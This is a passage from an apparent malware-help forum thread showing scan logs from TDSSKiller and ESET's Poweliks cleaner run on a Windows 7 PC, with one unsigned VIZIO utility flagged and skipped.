16:02:10.0744 0x4af4 [ BCB1310604AA415C4508708975B3931E, 9D943F086D454345153A0DD426B4432532A44FD87950386B186E1CAD2AC70565 ] WinRM C:\Windows\system32\WsmSvc.dll
16:02:10.0806 0x4af4 WinRM - ok
16:02:10.0838 0x4af4 [ FE88B288356E7B47B74B13372ADD906D, A16B166F6BB32EF9D2A142F27B9EC54CBC7B3AC915799783CF4C40E525BC9E03 ] WinUsb C:\Windows\system32\DRIVERS\WinUsb.sys
16:02:10.0838 0x4af4 WinUsb - ok
16:02:10.0869 0x4af4 [ 4FADA86E62F18A1B2F42BA18AE24E6AA, CE1683386886BF34862681A46199EA7E7FB4232A186047DA7FBD8EC240AF6726 ] Wlansvc C:\Windows\System32\wlansvc.dll
16:02:10.0900 0x4af4 Wlansvc - ok
16:02:10.0947 0x4af4 [ 06C8FA1CF39DE6A735B54D906BA791C6, D8FEC7DE227781CDA876904701B2AA995268F74DCD6CB34AA0296C557FC283B6 ] wlcrasvc C:\Program Files\Windows Live\Mesh\wlcrasvc.exe
16:02:10.0962 0x4af4 wlcrasvc - ok
16:02:11.0072 0x4af4 [ 2BACD71123F42CEA603F4E205E1AE337, 1FEF20554110371D738F462ECFFA999158EFEED02062414C58C1B61C422BF0B9 ] wlidsvc C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
16:02:11.0118 0x4af4 wlidsvc - ok
16:02:11.0134 0x4af4 [ F6FF8944478594D0E414D3F048F0D778, 6F75E0AE6127B33A92A88E59D4B048FD4C15F997807BE7BF0EFE76F95235B1D9 ] WmiAcpi C:\Windows\system32\DRIVERS\wmiacpi.sys
16:02:11.0134 0x4af4 WmiAcpi - ok
16:02:11.0165 0x4af4 [ 38B84C94C5A8AF291ADFEA478AE54F93, 1AC267AC73670BEA5F3785C9AD9DB146F8E993A862C843742B21FDB90D102B2A ] wmiApSrv C:\Windows\system32\wbem\WmiApSrv.exe
16:02:11.0181 0x4af4 wmiApSrv - ok
16:02:11.0196 0x4af4 WMPNetworkSvc - ok
16:02:11.0259 0x4af4 [ 58540037A4A3EEEEFA47C84100E1694F, 9BB055D008F1BC55E4361BBDB525CAD2E2E0ED7CFF1AA34A9BA7BEEDEA1A4B08 ] WMZuneComm C:\Program Files\Zune\WMZuneComm.exe
16:02:11.0274 0x4af4 WMZuneComm - ok
16:02:11.0290 0x4af4 [ 96C6E7100D724C69FCF9E7BF590D1DCA, 2E63C9B0893B4FC03B7A71BAEA6202D3D3DB1B52F3643467829B5A573FD7655B ] WPCSvc C:\Windows\System32\wpcsvc.dll
16:02:11.0306 0x4af4 WPCSvc - ok
16:02:11.0306 0x4af4 [ 93221146D4EBBF314C29B23CD6CC391D, C0750858A65BF51E210CD244C825C121D67E025CD2D2455139991AAC289A90FE ] WPDBusEnum C:\Windows\system32\wpdbusenum.dll
16:02:11.0321 0x4af4 WPDBusEnum - ok
16:02:11.0337 0x4af4 [ 6BCC1D7D2FD2453957C5479A32364E52, E48554D31FBDCF8F985C1C72524CAA9106F5B7CC2B79064F8F5E2562D517F090 ] ws2ifsl C:\Windows\system32\drivers\ws2ifsl.sys
16:02:11.0352 0x4af4 ws2ifsl - ok
16:02:11.0368 0x4af4 [ E8B1FE6669397D1772D8196DF0E57A9E, 39FE0819360719F756BD31A1884A0508A1E2371ACC723E25E005CBEC0A7B02FA ] wscsvc C:\Windows\system32\wscsvc.dll
16:02:11.0384 0x4af4 wscsvc - ok
16:02:11.0384 0x4af4 WSearch - ok
16:02:11.0493 0x4af4 [ 61FF576450CCC80564B850BC3FB6713A, B2843BC9E2F62D27DCF6787D063378926748CE75002BADA1873DCB5039883705 ] wuauserv C:\Windows\system32\wuaueng.dll
16:02:11.0540 0x4af4 wuauserv - ok
16:02:11.0555 0x4af4 [ AB886378EEB55C6C75B4F2D14B6C869F, D6C4602EB8F291DADEDF3CD211013D4AC752DDE7E799C2D8D74AA4F5477CAED6 ] WudfPf C:\Windows\system32\drivers\WudfPf.sys
16:02:11.0571 0x4af4 WudfPf - ok
16:02:11.0586 0x4af4 [ DDA4CAF29D8C0A297F886BFE561E6659, 94E5DD649B5D86FA1A7C7D30FCF9644D0EE048D312E626111458ADF66BFBE978 ] WUDFRd C:\Windows\system32\DRIVERS\WUDFRd.sys
16:02:11.0602 0x4af4 WUDFRd - ok
16:02:11.0618 0x4af4 [ B20F051B03A966392364C83F009F7D17, 88ECEB55AE91F58F592B96EBC10B572747D5A2F9B7629E8F371761E4F7408A65 ] wudfsvc C:\Windows\System32\WUDFSvc.dll
16:02:11.0618 0x4af4 wudfsvc - ok
16:02:11.0649 0x4af4 [ 04F82965C09CBDF646B487E145060301, 2CD8533EDBE24C3E42EB7550E20F8A2EB9E5E345B165DEF543163A6BC1FDD18B ] WwanSvc C:\Windows\System32\wwansvc.dll
16:02:11.0664 0x4af4 WwanSvc - ok
16:02:11.0961 0x4af4 [ D6EF205269C2A584AF6B56B9F95010F8, C414FF4805C5FE47E5B9E9694419AE08CBEA26ECEF1F977742B23AFA032CE8E1 ] ZuneNetworkSvc C:\Program Files\Zune\ZuneNss.exe
16:02:12.0086 0x4af4 ZuneNetworkSvc - ok
16:02:12.0132 0x4af4 [ 7A565AFE58F3822A9E622868E5CC0E5C, E09EF57D7739BF09EAF7A20199107D84F1290F9C34B9D3E6446A0215A8BE1990 ] ZuneWlanCfgSvc C:\Program Files\Zune\ZuneWlanCfgSvc.exe
16:02:12.0148 0x4af4 ZuneWlanCfgSvc - ok
16:02:12.0148 0x4af4 ================ Scan global ===============================
16:02:12.0164 0x4af4 [ BA0CD8C393E8C9F83354106093832C7B, 18D8A4780A2BAA6CEF7FBBBDA0EF6BF2DADF146E1E578A618DD5859E8ADBF1A8 ] C:\Windows\system32\basesrv.dll
16:02:12.0195 0x4af4 [ 88EDD0B34EED542745931E581AD21A32, DC2B93E1CEF5B0BCEE08D72669BB0F3AD0E8E6E75BDC08858407ED92F6FFA031 ] C:\Windows\system32\winsrv.dll
16:02:12.0210 0x4af4 [ 88EDD0B34EED542745931E581AD21A32, DC2B93E1CEF5B0BCEE08D72669BB0F3AD0E8E6E75BDC08858407ED92F6FFA031 ] C:\Windows\system32\winsrv.dll
16:02:12.0242 0x4af4 [ D6160F9D869BA3AF0B787F971DB56368, 0033E6212DD8683E4EE611B290931FDB227B4795F0B17C309DC686C696790529 ] C:\Windows\system32\sxssrv.dll
16:02:12.0273 0x4af4 [ 24ACB7E5BE595468E3B9AA488B9B4FCB, 63541E3432FCE953F266AE553E7A394978D6EE3DB52388D885F668CF42C5E7E2 ] C:\Windows\system32\services.exe
16:02:12.0288 0x4af4 [ Global ] - ok
16:02:12.0288 0x4af4 ================ Scan MBR ==================================
16:02:12.0304 0x4af4 [ A36C5E4F47E84449FF07ED3517B43A31 ] \Device\Harddisk0\DR0
16:02:12.0538 0x4af4 \Device\Harddisk0\DR0 - ok
16:02:12.0538 0x4af4 ================ Scan VBR ==================================
16:02:12.0554 0x4af4 [ 2EA9BF8CDE8B71F3CA2C1BC9FEF1EED1 ] \Device\Harddisk0\DR0\Partition1
16:02:12.0569 0x4af4 \Device\Harddisk0\DR0\Partition1 - ok
16:02:12.0585 0x4af4 ================ Scan generic autorun ======================
16:02:12.0803 0x4af4 [ 4058D1C660E32D6E6A2C2B672640EF60, 8F655773C4909365A41358CEF6CB7C399A104ECDAA1B9EAFB26269A8EF413ACA ] C:\Program Files (x86)\VIZIO\VIZIO Wireless Touchpad\FspUip.exe
16:02:12.0897 0x4af4 FspUip - ok
16:02:13.0006 0x4af4 [ 5EE06BCE2FCC6A6224FC146FBDF78B2E, C9A82EFD1DAF9571C29E87096F5BFE1CBFD98F0AB36428FF43DC6E59BEB6823A ] C:\Program Files\SRS Labs\SRS Control Panel\SRSPanel_64.exe
16:02:13.0053 0x4af4 SRS Premium Sound HD - ok
16:02:13.0084 0x4af4 [ 7307AEC9FA7F0872A26F4B5D2E8B623A, 95C9EED87278F638C8DAEDBE0ECB10F8FC725623AB707DD7C36F3A11A361BE52 ] C:\Windows\system32\igfxtray.exe
16:02:13.0084 0x4af4 IgfxTray - ok
16:02:13.0100 0x4af4 [ 053C46FD07C5FB6D4C73FCC7DE72D3D3, D636554AA1C8899C7B85ABE27194F8BFE6002634CE69BCD7127F3081C6E79B81 ] C:\Windows\system32\hkcmd.exe
16:02:13.0115 0x4af4 HotKeysCmds - ok
16:02:13.0131 0x4af4 [ 5ED0DF577AC20A47685DE15D25C077D8, 72B33534D88C0AA944A548489E05C500D1A45FA9818446C7CC9E111DE9C8C1F3 ] C:\Windows\system32\igfxpers.exe
16:02:13.0146 0x4af4 Persistence - ok
16:02:13.0240 0x4af4 [ 048FA2F7B7F5292ABD6FE52D360708AB, CD3E9897D706D2D3E7F4492432BC69182201FAB0E85C58683E82094C7AD5F303 ] C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe
16:02:13.0271 0x4af4 AtherosBtStack - detected UnsignedFile.Multi.Generic ( 1 )
16:02:13.0271 0x4af4 Detect skipped due to KSN trusted
16:02:13.0271 0x4af4 AtherosBtStack - ok
16:02:13.0302 0x4af4 [ F282E6109982A4ABDD925BA3F6EE04AB, 1D8C98549D7A02F9228C3FB122A07F8E87ACE936FEC6FD3B5F517243F330E951 ] C:\Program Files (x86)\Bluetooth Suite\AthBtTray.exe
16:02:13.0318 0x4af4 AthBtTray - detected UnsignedFile.Multi.Generic ( 1 )
16:02:13.0318 0x4af4 Detect skipped due to KSN trusted
16:02:13.0318 0x4af4 AthBtTray - ok
16:02:13.0427 0x4af4 [ A6AAD37CDCAE75CB62D039E3A4D8F5E3, 4FF763B0D129175BA1B1E794BA313E6C63F7A89D377C786BF5E730AF2A1D95D1 ] c:\Program Files\Microsoft Security Client\msseces.exe
16:02:13.0458 0x4af4 MSC - ok
16:02:13.0505 0x4af4 [ B1964E8776FD7633F149788F5B2A71CB, E30AC137B9DC2D3456499E0BB3B1955D2E0F7FFDB11E7A290A9DA25C76F4FAF8 ] C:\Program Files\Common Files\Common Desktop Agent\CDASrv.exe
16:02:13.0505 0x4af4 CDAServer - ok
16:02:13.0568 0x4af4 [ 4D1DA8CE5E364D22B4FF00F163194514, 165DE474309206A0F51266F19EDB4AF3D7BAD19FDA61B636AEE7A04278DBBC2C ] C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe
16:02:13.0599 0x4af4 USB3MON - ok
16:02:13.0817 0x4af4 [ 2F816382F8F0D1EA7125E14467788FA2, E5397C0CA572DCBD9156F889AD9E790EBC22CE18DF3653340A93772A3A3925D4 ] C:\Program Files (x86)\VIZIO\VIZIO_FN_Key_Utility\XVx.exe
16:02:13.0942 0x4af4 OSD Utility - detected UnsignedFile.Multi.Generic ( 1 )
16:02:13.0942 0x4af4 OSD Utility ( UnsignedFile.Multi.Generic ) - warning
16:02:16.0532 0x4af4 [ F4FEC311177C29BF7FF3A1B6002B3B64, A51312B76D0187BF729BE75A3AA404F3EFDA25B33DBC2D2B1B6218ECEC4E8429 ] C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Reader_sl.exe
16:02:16.0547 0x4af4 Adobe Reader Speed Launcher - ok
16:02:16.0610 0x4af4 [ 94A4D6915D4F572309DF6137E1846528, E46BDF83CAA6683AA655DBA3D2C8DC7AC06251E952466A20CFDA3A16B1840455 ] C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe
16:02:16.0625 0x4af4 APSDaemon - ok
16:02:16.0703 0x4af4 [ 47EA5F76FAB723C61AB4A0D79BAD512C, A7A38EB0A7068B160E6949945EF639F999A06AE35746F6E79C7350745798E5C9 ] C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
16:02:16.0734 0x4af4 Adobe ARM - ok
16:02:16.0781 0x4af4 [ 79C28DDF889C26FDD6162F796FD49BC4, C1E2468B4F0F52BD707D16656F33CC438AF8E18A38BB6CFB64D11F23993F72F0 ] C:\Program Files (x86)\iTunes\iTunesHelper.exe
16:02:16.0797 0x4af4 iTunesHelper - ok
16:02:16.0859 0x4af4 [ 14D6542607ACD4B2D1DDB1A36E0D8813, 3A270600549E8E7988D5AF3486C0F504269B9573393D87BF87BDB2287BF007B2 ] C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
16:02:16.0890 0x4af4 SunJavaUpdateSched - ok
16:02:17.0280 0x4af4 [ 15D6EFED817CE145FF05A9829050D547, 8ABE7E22C146F2EEE3F3F3713C92BC1D6734477E488872D22ABE2188D2077A39 ] C:\Program Files (x86)\Garmin\ANT Agent\ANT Agent.exe
16:02:17.0514 0x4af4 ANT Agent - detected UnsignedFile.Multi.Generic ( 1 )
16:02:17.0514 0x4af4 Detect skipped due to KSN trusted
16:02:17.0514 0x4af4 ANT Agent - ok
16:02:17.0624 0x4af4 [ 42170B17D82FF8059BA28C7B7AE8F097, 82E2DD884D75767E09884798925355FF9ACBFE0014A0CAED1EE97159D1FD164A ] C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_15_0_0_167_ActiveX.exe
16:02:17.0639 0x4af4 FlashPlayerUpdate - ok
16:02:17.0655 0x4af4 AV detected via SS2: Microsoft Security Essentials, C:\Program Files\Microsoft Security Client\msseces.exe ( 4.6.305.0 ), 0x61000 ( enabled : updated )
16:02:17.0655 0x4af4 Win FW state via NFP2: enabled
16:02:20.0151 0x4af4 ============================================================
16:02:20.0151 0x4af4 Scan finished
16:02:20.0151 0x4af4 ============================================================
16:02:20.0151 0x4c64 Detected object count: 1
16:02:20.0151 0x4c64 Actual detected object count: 1
16:03:09.0915 0x4c64 OSD Utility ( UnsignedFile.Multi.Generic ) - skipped by user
16:03:09.0915 0x4c64 OSD Utility ( UnsignedFile.Multi.Generic ) - User select action: Skip
ascot1340
2014-11-07, 23:39
[2014.11.07 16:06:32.924] - Begin
[2014.11.07 16:06:32.924] -
[2014.11.07 16:06:32.955] - ....................................
[2014.11.07 16:06:32.955] - ..::::::::::::::::::....................
[2014.11.07 16:06:32.955] - .::EEEEEE:::SSSSSS::..EEEEEE..TTTTTTTT.. Win32/Poweliks
[2014.11.07 16:06:32.955] - .::EE::::EE:SS:::::::.EE....EE....TT...... Version: 1.0.0.1
[2014.11.07 16:06:32.955] - .::EEEEEEEE::SSSSSS::.EEEEEEEE....TT...... Built: Oct 15 2014
[2014.11.07 16:06:32.971] - .::EE:::::::::::::SS:.EE..........TT......
[2014.11.07 16:06:32.971] - .::EEEEEE:::SSSSSS::..EEEEEE.....TT..... Copyright (c) ESET, spol. s r.o.
[2014.11.07 16:06:32.971] - ..::::::::::::::::::.................... 1992-2013. All rights reserved.
[2014.11.07 16:06:32.971] - ....................................
[2014.11.07 16:06:32.971] -
[2014.11.07 16:06:32.971] - --------------------------------------------------------------------------------
[2014.11.07 16:06:32.971] -
[2014.11.07 16:06:32.971] - INFO: OS: 6.1.7601 SP1
[2014.11.07 16:06:32.971] - INFO: Product Type: Workstation
[2014.11.07 16:06:32.971] - INFO: WoW64: True
[2014.11.07 16:06:32.971] - INFO: Machine guid: CB50F163-9B72-4C15-9B76-50D0F196BE8B
[2014.11.07 16:06:32.971] -
[2014.11.07 16:06:35.264] - INFO: Scanning for system infection...
[2014.11.07 16:06:35.264] - --------------------------------------------------------------------------------
[2014.11.07 16:06:35.264] -
[2014.11.07 16:06:35.264] - INFO: Processing [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]...
[2014.11.07 16:06:35.264] - INFO: Processing [HKLM\Software\Microsoft\Windows\CurrentVersion\Run]...
[2014.11.07 16:06:35.264] - INFO: Processing [HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce]...
[2014.11.07 16:06:35.280] - INFO: Processing [HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce]...
[2014.11.07 16:06:35.280] - INFO: Processing classes...
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{022105BD-948A-40C9-AB42-A3300DDF097F}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{0F22A205-CFB0-4679-8499-A6F44A80A208}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{0F9285DF-3511-4FE6-A587-CD8F61A121CA}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{22181302-A8A6-4F84-A541-E5CBFC70CC43}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{2F0E2680-9FF5-43C0-B76E-114A56E93598}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{355EC88A-02E2-4547-9DEE-F87426484BD1}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{39125640-8D80-11DC-A2FE-C5C455D89593}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{51F9E8EF-59D7-475B-A106-C7EA6F30C119}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{699A646B-C61E-4C36-A253-620E4EBD294C}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{6D7374DE-63AA-473C-8C02-60D9CDCD84C5}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{71FDCAEA-B6F2-4B6C-A18C-6C85F0E4662F}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{84B5A313-CD5D-4904-8BA2-AFDC81C1B309}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{90B3DFBF-AF6A-4EA0-8899-F332194690F8}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{A1436E43-F58F-4D3B-B908-B6DA44563B00}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{A45426FB-E444-42B2-AA56-419F8FBEEC61}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{A480C024-04D0-4F28-8CF0-ADACE2BD839C}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{A54D478D-4F70-4F72-9A74-17C9986E35AB}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{AB9F4455-E591-4132-A386-0B91EAEDB96C}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{C3101A8B-0EE1-4612-BFE9-41FFC1A3C19D}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{C442AC41-9200-4770-8CC0-7CDB4F245C55}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{C9E37353-EC76-4A58-B575-BBA8B4BD06D1}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0000-0003-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0000-0004-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0000-0005-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0000-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0001-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0001-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0002-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0002-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0003-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0003-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0004-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0004-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0005-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0005-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0006-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0006-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0007-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0007-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0008-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0008-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0009-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0009-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0010-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0010-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0011-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0011-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0012-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0012-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0013-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0013-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0014-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0014-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0015-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0015-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0016-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0016-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0017-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0017-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0018-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0018-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0019-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.280] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0019-ABCDEFFEDCBB}]
